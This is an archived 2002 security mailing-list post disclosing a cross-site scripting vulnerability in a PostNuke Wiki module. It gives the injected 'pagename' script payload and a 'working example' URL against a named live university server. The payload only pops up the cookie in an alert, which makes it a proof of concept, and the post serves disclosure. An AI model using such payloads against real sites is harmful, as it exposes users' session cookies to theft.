Wiki module postnuke Cross Site Scripting Vulnerability

• Previous message: xileat_private: "Re:[VulnWatch] wp-02-0001: GoAhead Web Server Directory Traversal + Cross Site Scripting"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------
Class :         input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run phpwiki, the risk is classified as Medium to High.
- ----------------------------------------------------
This wiki is running as a PostNuke module. 
- ------------------------------------

Exploit:         pagename=|script|alert(document.cookie)|/script|

Change | x <>

Working Example :

http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

- --------------------------------------------------------------------------------------------
programmer of wiki module and admin of postnuke-espanol.org receives a copy 
this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
http://www.gauchohack.com.ar
http://www.hackindex.org


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
PlAN98+qigqp8S9pkkfFRm4=
=c2FT
-----END PGP SIGNATURE-----

• Next message: xileat_private: "Re:[VulnWatch] wp-02-0001: GoAhead Web Server Directory Traversal + Cross Site Scripting"
• Previous message: xileat_private: "Re:[VulnWatch] wp-02-0001: GoAhead Web Server Directory Traversal + Cross Site Scripting"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 17 2002 - 09:21:02 PDT